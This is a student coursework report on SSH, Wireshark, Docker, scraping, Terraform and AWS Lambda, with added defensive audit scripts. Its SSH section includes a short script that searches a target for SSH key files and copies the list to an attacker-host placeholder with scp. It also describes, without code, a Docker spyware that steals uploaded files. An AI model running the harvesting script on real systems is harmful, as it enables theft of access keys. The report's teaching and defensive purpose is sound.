
COURSEWORK

V.A's CL-CY-001 course work. Lv 3


CLCY Level 2 Report

31 / 3 / 2025


TASK : SSH

US Employee Outsourced His Job to China for 1/5th of His Salary?! At first, it sounds wild: a guy in China remotely controlling a US employee’s computer?! But that’s exactly what we do daily with SSH.

What is SSH?

SSH (Secure Shell) lets you securely access and manage remote computers over the internet:

ssh user@server_ip

Common uses: servers, Git, cloud computing, remote administration. Before SSH, we had Telnet, which sent passwords in plaintext: a hacker’s dream. SSH encrypts the whole session (authentication and data), making it far more secure.

SSH Keys: Secure Authentication

Instead of passwords (which hackers can guess), SSH uses key pairs:

  1. Generate a key pair (on your local machine):

    ssh-keygen -t ed25519
    

    This creates a private key (id_ed25519) and a public key (id_ed25519.pub).

  2. Share the public key with the remote system:

    ssh-copy-id user@server_ip
    

    Now, you can log in without entering a password:

    ssh user@server_ip
    

SSH Key Harvesting

#!/bin/bash

TARGET="user@target_ip"
DEST="user@attacker_ip"

ssh "$TARGET" "find / -name 'id_rsa*' -o -name '*.pub' 2>/dev/null" > keys.txt
scp -r keys.txt "$DEST:/home/user/loot"


This script searches the target for SSH key files, writes the list of paths it finds to keys.txt, and uploads that file to an attacker’s server. Always protect your SSH keys!
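The key-pair steps above and the harvesting script both come down to one thing: a private key is only as safe as the file that holds it. The audit below is an added example (not part of the report) that checks a ~/.ssh directory the way a defender would: directory and key-file permissions, and whether each private key is passphrase-protected. For OpenSSH-format keys it decodes the armor and reads the ciphername field (which is "none" for an unencrypted key); for legacy PEM keys it looks for the "Proc-Type: 4,ENCRYPTED" header. The demo directory it builds contains constructed key files that carry only the header fields the parser reads; they are not usable keys.

```python
"""Audit an ~/.ssh directory for weak permissions and passphrase-less private keys."""
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(buf, off):
    """Read one SSH wire-format string (4-byte big-endian length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def is_private_key(text):
    return "-----BEGIN" in text and "PRIVATE KEY-----" in text


def key_is_encrypted(text):
    """True if passphrase-protected, False if not, None if the format is unknown."""
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        try:
            blob = base64.b64decode(body)
            if not blob.startswith(OPENSSH_MAGIC):
                return None
            cipher, _ = _read_string(blob, len(OPENSSH_MAGIC))  # ciphername, then kdfname
        except (ValueError, struct.error):
            return None
        return cipher != b"none"
    if "-----BEGIN ENCRYPTED PRIVATE KEY-----" in text:   # PKCS#8, encrypted
        return True
    if "Proc-Type: 4,ENCRYPTED" in text:                   # legacy PEM with DEK-Info
        return True
    return False                                           # plain PEM private key


def audit_ssh_dir(ssh_dir):
    """Return a list of (path, problem) findings; an empty list means nothing to fix."""
    findings = []
    ssh_dir = Path(ssh_dir)
    if stat.S_IMODE(ssh_dir.stat().st_mode) & 0o077:
        findings.append((str(ssh_dir), "directory is group/world accessible (expected 0700)"))
    for p in sorted(ssh_dir.iterdir()):
        if not p.is_file():
            continue
        try:
            text = p.read_text(errors="replace")
        except OSError:
            continue
        if not is_private_key(text):
            continue
        fmode = stat.S_IMODE(p.stat().st_mode)
        if fmode & 0o077:
            findings.append((str(p), f"private key mode {fmode:04o} is group/world readable (expected 0600)"))
        enc = key_is_encrypted(text)
        if enc is False:
            findings.append((str(p), "private key has no passphrase"))
        elif enc is None:
            findings.append((str(p), "unrecognised private key format"))
    return findings


def _fake_openssh_key(cipher, kdf):
    """Constructed armor holding only the header fields the audit parses; not a usable key."""
    blob = OPENSSH_MAGIC
    for s in (cipher, kdf):
        blob += struct.pack(">I", len(s)) + s
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def build_demo_dir():
    """Constructed ~/.ssh look-alike: one weak key, one well-protected key, one public key."""
    d = Path(tempfile.mkdtemp())
    os.chmod(d, 0o700)
    weak = d / "id_ed25519"
    weak.write_text(_fake_openssh_key(b"none", b"none"))          # no passphrase
    os.chmod(weak, 0o644)                                         # readable by everyone
    strong = d / "id_ed25519_work"
    strong.write_text(_fake_openssh_key(b"aes256-ctr", b"bcrypt"))  # passphrase-protected
    os.chmod(strong, 0o600)
    (d / "id_ed25519.pub").write_text("ssh-ed25519 CONSTRUCTED-PUBLIC-KEY demo\n")
    return d


if __name__ == "__main__":
    target = Path.home() / ".ssh"
    for path, problem in (audit_ssh_dir(target) if target.is_dir() else audit_ssh_dir(build_demo_dir())):
        print(f"{path}: {problem}")
```

Run it against a real ~/.ssh to get the findings for your own keys; without one it audits the constructed demo directory, reporting the 0644 mode and the missing passphrase on id_ed25519 and nothing for the protected key. On the server side the matching hardening is to disable password logins in sshd_config (PasswordAuthentication no) once key auth works.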

TASK : WIRESHARK

Wireshark is an open-source packet analyzer widely used for network troubleshooting, security analysis, and protocol development. I used it to capture Wi-Fi traffic while logging into a vulnerable PHP application over HTTP (username: "admin123", password: "admin123"), using the display filter:

tcp contains "admin123"

I was able to retrieve the credentials in plaintext!!! How scary.

[Screenshot: Plaintext]

Cool features of the statistics menu:

  1. HTTP Requests & Responses
    Found under Statistics > HTTP > Requests, this option tracks login attempts and POST/GET requests. Observing multiple POST requests to /login.php indicates a potential brute-force attack.

  2. Conversations
    Located in Statistics > Conversations > TCP, this shows client-server interactions. Identifying repeated login attempts from a single IP address suggests suspicious activity.
    [Screenshot: Conversations]

  3. IO Graph (Latency Analysis)
    Provides a graphical representation of round-trip times, helping detect network delays. Observing high latency indicates possible congestion or issues in the network.
    [Screenshot: IO Graph]

  4. Retransmissions & Duplicate ACKs
    These metrics help identify network congestion or attack attempts.

    • Filter used:
    tcp.analysis.duplicate_ack || tcp.analysis.retransmission
    

    [Screenshot: Retransmission]
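The two things the capture above exposes, credentials in a plaintext HTTP form and repeated POSTs to /login.php from one address, can be turned into detection logic rather than eyeballed in Statistics menus. The script below is an added example, not part of the report: it reads request records in the tab-separated shape that tshark prints for `-T fields -e frame.time_epoch -e ip.src -e http.request.method -e http.request.uri -e http.file_data` (the sample lines, IPs, timestamps and credentials are constructed), pulls out any form field that carries a password, and flags a source that posts to the login page more than a threshold number of times inside a sliding window.

```python
"""Plaintext-credential and login brute-force detection over HTTP request records."""
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample in the shape of `tshark ... -T fields` output:
# frame.time_epoch, ip.src, http.request.method, http.request.uri, http.file_data
SAMPLE_TSHARK_OUTPUT = """\
1711900000.10\t192.168.1.20\tGET\t/index.php\t
1711900003.50\t192.168.1.20\tPOST\t/login.php\tusername=admin123&password=admin123
1711900010.00\t192.168.1.37\tPOST\t/login.php\tusername=admin&password=123456
1711900012.20\t192.168.1.37\tPOST\t/login.php\tusername=admin&password=password
1711900014.10\t192.168.1.37\tPOST\t/login.php\tusername=admin&password=letmein
1711900016.30\t192.168.1.37\tPOST\t/login.php\tusername=admin&password=qwerty
1711900018.00\t192.168.1.37\tPOST\t/login.php\tusername=admin&password=admin
1711900020.40\t192.168.1.37\tPOST\t/login.php\tusername=admin&password=admin123
1711900025.00\t192.168.1.20\tGET\t/dashboard.php\t
"""

CREDENTIAL_KEYS = ("password", "passwd", "pwd", "pass")


def parse_records(text):
    """One dict per request; the body column is empty for requests without one."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, uri, body = line.split("\t", 4)
        records.append({"time": float(ts), "src": src, "method": method, "uri": uri, "body": body})
    return records


def find_plaintext_credentials(records):
    """(src, uri, username, password) for every form POST that carries a password field."""
    hits = []
    for r in records:
        if r["method"] != "POST" or not r["body"]:
            continue
        form = parse_qs(r["body"])
        secret_fields = [k for k in form if k.lower() in CREDENTIAL_KEYS]
        if secret_fields:
            user = form.get("username", form.get("user", ["?"]))[0]
            hits.append((r["src"], r["uri"], user, form[secret_fields[0]][0]))
    return hits


def detect_login_bruteforce(records, path="/login.php", threshold=5, window=60.0):
    """{src: max POSTs to `path` inside any `window`-second span} for sources at/over threshold."""
    times = defaultdict(list)
    for r in records:
        if r["method"] == "POST" and r["uri"].split("?")[0] == path:
            times[r["src"]].append(r["time"])
    flagged = {}
    for src, ts in times.items():
        ts.sort()
        best, j = 0, 0
        for i in range(len(ts)):            # two-pointer sliding window over sorted times
            while ts[i] - ts[j] > window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    recs = parse_records(SAMPLE_TSHARK_OUTPUT)
    for src, uri, user, pw in find_plaintext_credentials(recs):
        print(f"plaintext credential from {src} to {uri}: {user} / {pw}")
    for src, n in detect_login_bruteforce(recs).items():
        print(f"possible brute force: {src} posted to /login.php {n} times within 60s")
```

On the sample, the first function lists all seven password submissions (the real fix is to serve the login page over HTTPS, which is why the `tcp contains` filter works at all), and the second flags only 192.168.1.37, which posted six times in about ten seconds; the single legitimate login from 192.168.1.20 stays below the threshold.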

TASK : DOCKER

If you're a software developer, you've probably heard the phrase:
"Wait... it works on my machine!" Most programming languages and packages frequently update with bug fixes and security patches. Unfortunately, the applications we build often require the exact same versions of these dependencies and even the same operating system to work properly.

What is Docker?

Docker is an open-source platform that allows developers to package applications and their dependencies into lightweight, portable containers.

Running a To-Do App with Docker

To pull the sample To-Do app from GitHub:

git clone https://github.com/docker/getting-started-todo-app
cd getting-started-todo-app

Now, without installing a single library or worrying about Node.js versions, you can run the app using:

docker compose up

This command starts the app inside a Docker container!!

[Screenshot: Pull docker]

Or, with docker run, you can start it on port 3000:

docker run -d -p 3000:3000 getting-started-todo-app

[Screenshot: To-do app]

Publishing the App to Docker Hub

To share the container image on Docker Hub, follow these steps:

  1. Log in:

    docker login
    
  2. Tag the local image with your Docker Hub username:

    docker tag getting-started-todo-app <dockerhub-username>/getting-started-todo-app:latest
    
  3. Push the image to the repository:

    docker push <dockerhub-username>/getting-started-todo-app:latest
    
    

[Screenshot: Pushed docker]

TASK : DOCKER SPYWARE

Spyware in Docker containers is particularly dangerous because it can operate stealthily within isolated environments. Docker’s containerization often limits visibility into internal processes, making it difficult for security tools to detect malicious activities. This enables spyware to silently steal sensitive data without raising alarms.

Implementation:

I created a spyware.js script designed to steal files uploaded to a Node.js server, saving them to a different folder. This script was then Dockerized, allowing it to run in an isolated environment.
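The visibility problem described above is mostly a configuration problem: a container that runs as root, with a writable root filesystem, extra capabilities or sensitive host paths bind-mounted into it gives spyware both the access and the persistence it needs. The audit below is an added example (not the report's spyware.js, which is not included here) that reads `docker inspect` output and lists those risky settings; the JSON is a constructed excerpt in the shape of real inspect output, with one container configured the way a file-stealing upload service should not be and a hardened variant of the same service for comparison.

```python
"""Flag risky settings in `docker inspect` output (constructed sample below)."""
import json

# Constructed excerpt in the shape of `docker inspect <container>` (a JSON array).
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/uploads-api",
        "Config": {"User": "", "Image": "uploads-api:latest"},
        "HostConfig": {
            "Privileged": False,
            "NetworkMode": "bridge",
            "ReadonlyRootfs": False,
            "CapAdd": ["SYS_ADMIN"],
        },
        "Mounts": [
            {"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock", "RW": True},
            {"Type": "bind", "Source": "/srv/uploads", "Destination": "/app/uploads", "RW": True},
        ],
    },
    {
        "Name": "/uploads-api-hardened",
        "Config": {"User": "node", "Image": "uploads-api:latest"},
        "HostConfig": {
            "Privileged": False,
            "NetworkMode": "bridge",
            "ReadonlyRootfs": True,
            "CapAdd": None,
            "CapDrop": ["ALL"],
        },
        "Mounts": [
            {"Type": "bind", "Source": "/srv/uploads", "Destination": "/app/uploads", "RW": True},
        ],
    },
])

SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock", "/proc", "/sys")
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "NET_ADMIN", "DAC_READ_SEARCH"}


def _is_sensitive(host_path):
    return host_path in SENSITIVE_HOST_PATHS or any(
        host_path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def audit_container(info):
    """Return a list of human-readable findings for one inspect record."""
    findings = []
    hc = info.get("HostConfig", {})
    cfg = info.get("Config", {})
    if hc.get("Privileged"):
        findings.append("runs --privileged: full access to host devices and kernel interfaces")
    if hc.get("NetworkMode") == "host":
        findings.append("uses host networking: no network isolation from the host")
    if hc.get("PidMode") == "host":
        findings.append("shares the host PID namespace: can see host processes")
    if not hc.get("ReadonlyRootfs"):
        findings.append("root filesystem is writable: dropped files and binaries persist")
    risky = set(hc.get("CapAdd") or []) & DANGEROUS_CAPS
    if risky:
        findings.append("adds dangerous capabilities: " + ", ".join(sorted(risky)))
    if not cfg.get("User"):
        findings.append("runs as root inside the container (Config.User is empty)")
    for m in info.get("Mounts", []):
        src = m.get("Source", "")
        if m.get("Type") == "bind" and _is_sensitive(src):
            mode = "rw" if m.get("RW") else "ro"
            findings.append(f"bind-mounts sensitive host path {src} ({mode})")
    return findings


def audit_inspect_json(text):
    """{container name: findings} for every record in a `docker inspect` JSON array."""
    return {c.get("Name", "?").lstrip("/"): audit_container(c) for c in json.loads(text)}


if __name__ == "__main__":
    for name, findings in audit_inspect_json(SAMPLE_INSPECT).items():
        print(name + (":" if findings else ": no findings"))
        for f in findings:
            print("  -", f)
```

Pipe a real `docker inspect` into `audit_inspect_json` to run it against your own containers. On the sample, uploads-api gets four findings (writable root filesystem, SYS_ADMIN, running as root, and the Docker socket mounted read-write, which is effectively root on the host), while the hardened variant, which only needs its uploads directory, gets none.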

[Screenshot: Uploaded file]

[Screenshot: File stolen]

TASK : WEB SCRAPING AND AUTOMATION

Web scraping is a powerful technique that automates data extraction from websites, eliminating the need for manual inspection of HTML elements. Instead of navigating through pages manually, automation tools like Selenium can interact with web pages just as a human would, clicking buttons, entering text, and extracting relevant information.

Selenium is widely used for browser automation and web testing, making it an excellent choice for tasks like retrieving real-time data from dynamic websites.

Implementation:

For this project, I used Selenium to extract flight prices from the Ixigo booking website, automating the process of searching for flights and capturing relevant pricing details. Here’s the output:

[Screenshot: Flight scraper]
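The report's own scraper is not included, so the following is an added example of the same pattern: drive a headless browser with Selenium, collect the text of the elements that hold prices, and turn that text into numbers you can compare. The CSS selector is a placeholder (real sites change their markup, so it is an assumption to fill in), the URL is whatever search page you are scraping, and only the parsing and summary functions run offline; `scrape_prices` needs Selenium plus a Chrome/chromedriver install.

```python
"""Selenium price scraper skeleton plus offline parsing of the scraped text."""
import re
from statistics import median

# Currency prefix is optional; the number must start with a digit so a stray comma never matches.
PRICE_RE = re.compile(r"(?:₹|Rs\.?|INR)?\s*(\d[\d,]*(?:\.\d+)?)")


def parse_price(text):
    """'₹ 4,599' -> 4599.0; None when the element text holds no number (e.g. 'Sold out')."""
    m = PRICE_RE.search(text)
    if not m:
        return None
    return float(m.group(1).replace(",", ""))


def summarise(prices):
    """Count/min/median/max over the prices that parsed; None if nothing parsed."""
    valid = sorted(p for p in prices if p is not None)
    if not valid:
        return None
    return {"count": len(valid), "min": valid[0], "median": median(valid), "max": valid[-1]}


def scrape_prices(url, price_selector, timeout=15):
    """Open `url` in headless Chrome, wait for the price elements, return parsed prices.

    `price_selector` is a placeholder CSS selector you must determine for the site.
    Imports are local so the offline helpers above work without Selenium installed.
    """
    from selenium import webdriver
    from selenium.webdriver.chrome.options import Options
    from selenium.webdriver.common.by import By
    from selenium.webdriver.support import expected_conditions as EC
    from selenium.webdriver.support.ui import WebDriverWait

    opts = Options()
    opts.add_argument("--headless=new")
    driver = webdriver.Chrome(options=opts)
    try:
        driver.get(url)
        WebDriverWait(driver, timeout).until(
            EC.presence_of_all_elements_located((By.CSS_SELECTOR, price_selector)))
        return [parse_price(el.text) for el in driver.find_elements(By.CSS_SELECTOR, price_selector)]
    finally:
        driver.quit()          # always release the browser, even on timeout


if __name__ == "__main__":
    # Constructed element texts standing in for what scrape_prices would return.
    scraped = ["₹ 4,599", "₹5,120", "From ₹ 3,999", "Sold out"]
    print(summarise([parse_price(t) for t in scraped]))
```

Two practical notes for automation like this: check the site's robots.txt and terms before scraping, and put a delay between searches; a fast loop of automated searches looks exactly like the abusive traffic the Wireshark section above flags.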

TASK: TERRAFORM

Managing cloud infrastructure through a graphical interface becomes impractical at scale. Terraform automates resource provisioning using a declarative configuration language, reducing manual effort and improving consistency.

What is Terraform?

Terraform is an infrastructure-as-code tool that provisions and manages cloud resources using a declarative configuration file.

Terraform Configuration (main.tf)

Terraform uses HCL (HashiCorp Configuration Language) or JSON to define resources. The configuration below sets up an AWS EC2 instance:

[Screenshot: main.tf]

After replacing the ami value with a valid AMI ID for your region, execute:

terraform init     # Initializes Terraform and downloads provider plugins
terraform apply    # Creates the defined resources
terraform destroy  # Deletes all resources

Terraform handles infrastructure as code, ensuring version control and automation in cloud environments.

[Screenshot: init apply]
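Because the plan is data before it becomes infrastructure, the security review can run between `terraform plan` and `terraform apply`. The script below is an added example (the report's main.tf is not reproduced here) that reads the JSON that `terraform show -json tfplan` produces and rejects an EC2 setup that would be created with SSH open to the whole internet, without IMDSv2 enforced (`metadata_options.http_tokens = "required"`), or with an unencrypted root volume. The plan excerpt is constructed; the AMI is an obvious placeholder, and the attribute names are those of the AWS provider's aws_security_group and aws_instance resources.

```python
"""Pre-apply policy check over `terraform show -json` plan output (constructed sample)."""
import json

# Constructed excerpt in the shape of `terraform show -json tfplan`.
SAMPLE_PLAN = json.dumps({
    "resource_changes": [
        {"address": "aws_security_group.web", "type": "aws_security_group",
         "change": {"actions": ["create"], "after": {
             "ingress": [
                 {"from_port": 22, "to_port": 22, "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]},
                 {"from_port": 443, "to_port": 443, "protocol": "tcp", "cidr_blocks": ["0.0.0.0/0"]},
             ]}}},
        {"address": "aws_instance.web", "type": "aws_instance",
         "change": {"actions": ["create"], "after": {
             "ami": "ami-PLACEHOLDER", "instance_type": "t2.micro",
             "metadata_options": [{"http_tokens": "optional"}],
             "root_block_device": [{"encrypted": False}],
         }}},
    ]
})

ADMIN_PORTS = {22, 3389}   # SSH and RDP should never be world-reachable


def _blocks(value):
    """Terraform renders nested blocks as lists of objects; tolerate a bare dict too."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def check_security_group(addr, after):
    out = []
    for rule in _blocks(after.get("ingress")):
        world = ("0.0.0.0/0" in (rule.get("cidr_blocks") or [])
                 or "::/0" in (rule.get("ipv6_cidr_blocks") or []))
        if not world:
            continue
        lo, hi = rule.get("from_port", 0), rule.get("to_port", 0)
        all_ports = (lo == 0 and hi == 0)            # protocol "-1" / all traffic
        if all_ports or any(lo <= p <= hi for p in ADMIN_PORTS):
            out.append(f"{addr}: ingress {lo}-{hi}/{rule.get('protocol')} open to the world")
    return out


def check_instance(addr, after):
    out = []
    mos = _blocks(after.get("metadata_options"))
    if not mos or any(mo.get("http_tokens") != "required" for mo in mos):
        out.append(f'{addr}: IMDSv2 not enforced (set metadata_options.http_tokens = "required")')
    for rbd in _blocks(after.get("root_block_device")):
        if not rbd.get("encrypted"):
            out.append(f"{addr}: root volume not encrypted")
    return out


CHECKS = {"aws_security_group": check_security_group, "aws_instance": check_instance}


def check_plan(plan_json):
    """Findings for every resource the plan will create or update; deletions are skipped."""
    findings = []
    for rc in json.loads(plan_json).get("resource_changes", []):
        actions = rc["change"]["actions"]
        if "delete" in actions and "create" not in actions:
            continue
        after = rc["change"].get("after") or {}
        check = CHECKS.get(rc["type"])
        if check:
            findings.extend(check(rc["address"], after))
    return findings


if __name__ == "__main__":
    import sys
    problems = check_plan(SAMPLE_PLAN)
    print("\n".join(problems) or "plan passes policy checks")
    sys.exit(1 if problems else 0)     # non-zero exit blocks `terraform apply` in a pipeline
```

Wire it in as `terraform plan -out=tfplan && terraform show -json tfplan | python check_plan.py` (with the script reading stdin instead of the sample) and a failing check stops the apply. On the sample it reports three problems: port 22 open to 0.0.0.0/0, IMDSv2 optional, and the unencrypted root volume; the HTTPS rule on 443 is left alone.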

TASK : AWS LAMBDA

Amazon Web Services (AWS) offers various cloud services, including:

  • IoT and Robotics Management: Tools to manage IoT devices and robots remotely.
  • EC2 (Elastic Compute Cloud): A scalable virtual server for running applications in the cloud.
  • S3 (Simple Storage Service): A storage service used by large companies like Netflix for content distribution.
  • Lambda: A serverless compute service that runs code in response to events, automatically scaling infrastructure.

Implementation (Lambda):

  1. Function Creation:
    A Lambda function named ChatAppHandler was created to handle the application logic. The code was written within the Lambda environment using AWS's tools.
  2. API Gateway Setup:
    API Gateway exposes Lambda functions through HTTP endpoints, enabling requests with methods like GET, POST, PUT, and DELETE. WebSockets can also be used for real-time communication, with methods like $connect, $disconnect, and $default.


  3. Stages and Deployment:
    The API Gateway was configured with stages for deployment management, and the service was deployed to make it live and accessible.
  4. Testing:
    After deployment, the system was tested by verifying the flow from receiving an HTTP request to executing the Lambda function.

[Screenshot: Test AWS]
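The report does not include the ChatAppHandler code, so the handler below is an added example of the request flow described in steps 1-4: API Gateway turns an HTTP request (or a WebSocket $connect/$disconnect/$default route) into an event, the function validates it and returns a response that API Gateway sends back. The event field names (httpMethod, body, isBase64Encoded, requestContext.routeKey, requestContext.http.method) are the ones API Gateway uses for REST, HTTP and WebSocket integrations; the in-memory message list is a stand-in for a real store, since Lambda execution environments do not persist state. Everything the function needs is constructed inline, so it runs without AWS.

```python
"""API Gateway -> Lambda chat handler with strict input validation (added example)."""
import base64
import json
import re

MAX_TEXT_LEN = 500
USER_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")
MESSAGES = []   # demo store only; use DynamoDB or similar in a real deployment


def _response(status, body):
    """Shape API Gateway expects back from a proxy-integrated function."""
    return {"statusCode": status,
            "headers": {"Content-Type": "application/json"},
            "body": json.dumps(body)}


def _json_body(event):
    """Decode the request body into a dict; None when it is missing, not JSON, or not an object."""
    raw = event.get("body") or ""
    if event.get("isBase64Encoded"):
        raw = base64.b64decode(raw).decode("utf-8", "replace")
    try:
        data = json.loads(raw) if raw else {}
    except ValueError:
        return None
    return data if isinstance(data, dict) else None


def validate_message(data):
    """Return (clean_message, error). Rejects unknown fields, wrong types and oversized text."""
    if data is None:
        return None, "body must be a JSON object"
    if set(data) - {"user", "text"}:
        return None, "unexpected fields"
    user, text = data.get("user"), data.get("text")
    if not isinstance(user, str) or not USER_RE.fullmatch(user):
        return None, "invalid user"
    if not isinstance(text, str) or not 1 <= len(text) <= MAX_TEXT_LEN:
        return None, f"text must be 1-{MAX_TEXT_LEN} characters"
    return {"user": user, "text": CONTROL_CHARS.sub("", text)}, None


def lambda_handler(event, context=None):
    """Entry point: WebSocket routes first, then HTTP methods; anything else is refused."""
    rc = event.get("requestContext", {})
    route = rc.get("routeKey")
    if route in ("$connect", "$disconnect"):
        return {"statusCode": 200}
    if route == "$default":
        msg, err = validate_message(_json_body(event))
        return {"statusCode": 400 if err else 200,
                "body": json.dumps({"error": err} if err else msg)}

    # REST APIs put the method in httpMethod; HTTP APIs (payload v2) in requestContext.http.method
    method = event.get("httpMethod") or rc.get("http", {}).get("method")
    if method == "GET":
        return _response(200, {"messages": MESSAGES[-50:]})
    if method == "POST":
        msg, err = validate_message(_json_body(event))
        if err:
            return _response(400, {"error": err})
        MESSAGES.append(msg)
        return _response(201, msg)
    return _response(405, {"error": "method not allowed"})


if __name__ == "__main__":
    # Constructed events standing in for what API Gateway would deliver.
    print(lambda_handler({"httpMethod": "POST", "body": '{"user": "alice", "text": "hello"}'}))
    print(lambda_handler({"httpMethod": "POST", "body": '{"user": "alice", "admin": true}'}))
    print(lambda_handler({"httpMethod": "GET"}))
```

The validation is the security-relevant part: the function only accepts the two fields it knows, bounds their size, and strips control characters before storing anything, so a client cannot smuggle extra attributes or oversized payloads through the gateway into the store. In step 4 of the report this is exactly the path that gets tested, request in, function out.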


UVCE,
K. R Circle,
Bengaluru 01